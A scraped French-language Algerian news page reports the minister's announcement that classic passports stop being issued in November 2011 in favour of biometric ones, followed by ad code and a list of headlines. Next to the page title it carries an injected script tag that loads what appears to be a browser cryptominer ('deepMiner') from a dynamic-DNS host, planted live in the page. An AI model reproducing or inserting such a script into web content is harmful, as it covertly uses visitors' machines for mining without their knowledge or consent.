googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Fin de l'établissement du passeport classique en novembre 2011<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Fin de l'établissement du passeport classique en novembre 2011
Il sera valable jusqu'à 2015
Publié dans Le Maghreb le 27 - 12 - 2010

C'est bien le début de la fin pour le passeport vert en papier. Place au document biométrique. "Le passeport classique ne sera plus établi à partir du 25 novembre 2011", a déclaré, hier, à Tlemcen, le ministre de l'Intérieur et des Collectivités locales, M. Daho Ould Kablia. "Néanmoins, le passeport classique sera valable jusqu'au 24 novembre 2015", a ajouté le ministre qui s'exprimait en marge de la visite de d'inspection qui l'a conduit à la capitale des Zianides.
Selon Ould Kablia, 60 équipements sur les 600 nécessaires à l'établissement du passeport biométrique sont disponibles. Le dossier d'acquisition des autres équipements se trouve actuellement au niveau de la commission nationale des marchés publics. Dès son approbation, l'entreprise choisie aura un délai de six mois pour installer tous les équipements pour pouvoir établir le nouveau passeport à travers l'ensemble du territoire national, a-t-il dit.
Il convient de rappeler que la numérisation concerne également la carte d'identité nationale. Le projet a été annoncé depuis la fin de l'année 2009 mais il semble qu'il s'est heurté à des problème d'ordre technique qui ont retardé son avancement. L'élaboration du passeport et de la carte d'identité biométriques vise à faciliter la lutte contre le terrorisme et la criminalité. Ces documents biométriques, selon les responsables du ministère de l'Intérieur, sont "infalsifiables" en raison de leur complexité technique. Pour ce qui est du passeport, il faut rappeler que sa généralisation répond, aussi, aux exigences de l'Organisation internationale de l'aviation civile.
Signalons, par ailleurs, que l'élaboration de ces documents sera accompagnée par l'institution d'un numéro d'identification nationale unique (NIN) pour chaque citoyen. Le lancement de cette opération de numérisation, il y a déjà plus d'une année, a été marquée par une certaine défiance de la part d'une partie de la population.
Notamment pour ce qui concerne les formulaires dans lesquels on demandait des information jugées " intimes " par un nombre de citoyens. Ceci, en plus de l'exigence pour les femmes de se dévoiler dans les photos qu'elles doivent remettre à l'administration pour obtenir ces fameux documents dotés de puces.


Cliquez ici pour lire l'article depuis sa source.